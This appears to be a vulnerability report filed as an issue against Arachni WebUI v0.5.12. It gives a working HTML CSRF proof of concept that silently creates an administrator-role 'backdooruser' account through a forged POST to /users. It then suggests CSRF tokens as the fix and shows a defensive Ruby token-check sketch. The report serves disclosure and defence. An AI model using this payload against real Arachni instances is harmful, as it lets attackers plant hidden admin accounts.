Open dfezza opened 4 years ago
Vulnerable components: Arachni c1.5.1 - WebUI v0.5.12
Steps:
Cross-Site Request Forgery (CSRF) PoC to add a backdoor-account:
```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:9292/users" method="POST">
      <input type="hidden" name="utf8" value="✓" />
      <input type="hidden" name="authenticity_token" value="MjWHU198l/sSd/2IKpPJWDuv1WJziw90AuNHj3pMrO/uyidswqmseuhavNrwsuHp0UfSs5uC8IEtaq3TxHflWg==" />
      <input type="hidden" name="user[name]" value="backdooruser" />
      <input type="hidden" name="user[password]" value="backdooruser" />
      <input type="hidden" name="user[email]" value="backdooruser@backdooruser.com" />
      <input type="hidden" name="user[password_confirmation]" value="backdooruser" />
      <input type="hidden" name="user[role_ids][]" value="1" />
      <input type="hidden" name="user[role_ids][]" value="" />
      <input type="hidden" name="commit" value="Create User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
Solution: Add a CSRF-token to the post forms.
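
A minimal sketch of the server-side check the suggested fix depends on, added here as an example (it is not Arachni's code or Rails' implementation): a Rack-style guard that lets a state-changing request through only when its `authenticity_token` matches a value bound to the caller's session. `CsrfGuard`, the `session_id` env key, and the stand-in `/users` handler are assumptions made for illustration.

```ruby
require "securerandom"
require "openssl"

# Hypothetical Rack-style guard (illustration only): rejects state-changing
# requests whose authenticity_token is not bound to the caller's session.
class CsrfGuard
  SAFE_METHODS = %w[GET HEAD OPTIONS].freeze

  def initialize(app, secret)
    @app, @secret = app, secret
  end

  # Token = HMAC(server secret, session id); it cannot be computed off-server.
  def token_for(session_id)
    OpenSSL::HMAC.hexdigest("SHA256", @secret, session_id)
  end

  def call(env)
    return @app.call(env) if SAFE_METHODS.include?(env["REQUEST_METHOD"])
    expected = token_for(env["session_id"].to_s)
    supplied = env.dig("params", "authenticity_token").to_s
    return @app.call(env) if secure_equal?(expected, supplied)
    [403, { "content-type" => "text/plain" }, ["CSRF token missing or invalid"]]
  end

  # Constant-time comparison so the check does not leak matching prefixes.
  def secure_equal?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Constructed stand-in for a POST /users handler that records created users.
USERS = []
APP = lambda do |env|
  USERS << env["params"]["user[name]"] if env["REQUEST_METHOD"] == "POST"
  [200, {}, ["created"]]
end
GUARD = CsrfGuard.new(APP, SecureRandom.hex(32))

# Sends a constructed POST /users through the guard and returns the status.
def post_users(session_id, token)
  params = { "authenticity_token" => token, "user[name]" => "newuser" }
  GUARD.call("REQUEST_METHOD" => "POST", "PATH_INFO" => "/users",
             "session_id" => session_id, "params" => params).first
end

puts post_users("admin-session", "token-chosen-by-attacker")        # 403
puts post_users("admin-session", GUARD.token_for("admin-session"))  # 200
```

In a Rails application the equivalent control is `protect_from_forgery with: :exception` in the base controller, combined with forms rendered through the Rails form helpers.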